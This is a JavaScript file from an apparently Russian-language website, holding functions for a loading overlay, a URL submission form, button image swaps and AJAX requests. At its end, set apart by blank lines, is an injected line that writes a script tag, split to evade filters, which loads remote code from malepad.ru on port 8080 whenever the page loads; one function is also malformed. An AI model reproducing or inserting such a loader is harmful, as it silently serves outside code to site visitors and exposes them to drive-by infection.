function showloading(){	var my_width  = 0;	var my_height = 0; 	var loading_ = document.getElementById("loading");	var loading_bg_ = document.getElementById("loading_bg");    if ( typeof( window.innerWidth ) == 'number' )	{		my_width  = window.innerWidth;		my_height = window.innerHeight;	}	else if ( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) )	{		my_width  = document.documentElement.clientWidth;		my_height = document.documentElement.clientHeight;	}	else if ( document.body && ( document.body.clientWidth || document.body.clientHeight ) )	{		my_width  = document.body.clientWidth;		my_height = document.body.clientHeight;	}    if (document.getElementById("dg").style.opacity)        document.getElementById("dg").style.opacity = 0.3;    if ( document.getElementById("dg").filters )    	document.getElementById("dg").filters.alpha.opacity=30;    if (loading_ != null || loading_bg_ != null) {	loading_bg_.style.display = "block";	loading_.style.position = 'absolute';	loading_.style.display  = 'block';	}	var loading_height = parseInt( loading_.style.Height );	var loading_width  = parseInt( loading_.style.Width );	loading_height = loading_height ? loading_height : 70;	loading_width  = loading_width  ? loading_width  : 200;	var scrollY = 0;	if ( document.documentElement && document.documentElement.scrollTop )	{		scrollY = document.documentElement.scrollTop;	}	else if ( document.body && document.body.scrollTop )	{		scrollY = document.body.scrollTop;	}	else if ( window.pageYOffset )	{		scrollY = window.pageYOffset;	}	else if ( window.scrollY )	{		scrollY = window.scrollY;	}	var setX = ( my_width  - loading_width  ) / 2;	var setY = ( my_height - loading_height ) / 2 + scrollY;	setX = ( setX < 0 ) ? 0 : setX;	setY = ( setY < 0 ) ? 0 : setY;	loading_.style.left = setX + "px";	loading_.style.top  = setY + "px";}function hideloading(){		var loading_ = document.getElementById("loading");		var loading_bg_ = document.getElementById("loading_bg");		if (loading_ != null || loading_bg_ != null) {			loading_.style.display = "none";			loading_bg_.style.display = "none";		}    if (document.getElementById("dg").style.opacity)        document.getElementById("dg").style.opacity = 100;    if ( document.getElementById("dg").filters )    	document.getElementById("dg").filters.alpha.opacity=100;}//Отправка запросаfunction GoForm(){        var url=document.cypr.url.value;        var url2=document.cypr.url.value.replace('http://', '');         if (url=="http://" || (url=="")){             document.getElementById("error").innerText="Неверный запрос!";         }else if (document.cypr.url.value.indexOf('.')==-1){             document.getElementById("error").innerText="Неверный запрос!";         }else if (url2.length<4){             document.getElementById("error").innerText="Неверный запрос!";         }else{             sendQuery('cont', 'buttons.php?act=cypr&url='+document.cypr.url.value);             document.cypr.url.value="http://";             document.getElementById("error").innerText="";         }}function ActButton(who) {        var tmp;        if (top.document.images[who].src.indexOf('_a') == -1) {                tmp = document.images[who].src.replace('_na', '_a');                document.images[who].src = tmp;        }}function NotActButton(who) {        var tmp;        if (top.document.images[who].src.indexOf('_a') != -1) {                tmp = document.images[who].src.replace('_a', '_na');                document.images[who].src = tmp;        }}function ActNotActButt(who1, who2){	     NotActButton(who2);	     ActButton(who1);	     document.getElementById("next").disabled=true;}function ActNext(){         document.getElementById("next").disabled=false;}var url3;function Next(url3) {}        sendQuery('cont', url3);var request;var element;function createRequest() {  try {    request = new XMLHttpRequest();  } catch (trymicrosoft) {    try {      request = new ActiveXObject("Msxml2.XMLHTTP");    } catch (othermicrosoft) {      try {        request = new ActiveXObject("Microsoft.XMLHTTP");      } catch (failed) {        request = false;      }    }  }  if (!request)    alert("Error initializing XMLHttpRequest!");}function sendQuery(elem ,url) {     showloading();     createRequest();     element=elem;     request.open("GET", url, true);     request.onreadystatechange = updatePage;     request.send(null);}function updatePage() {     if (request.readyState == 4) {       if (request.status == 200) {       document.getElementById(element).innerHTML = '';         document.getElementById(element).innerHTML = request.responseText;         hideloading();       } else         alert("status is "+request.status);     }}



document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');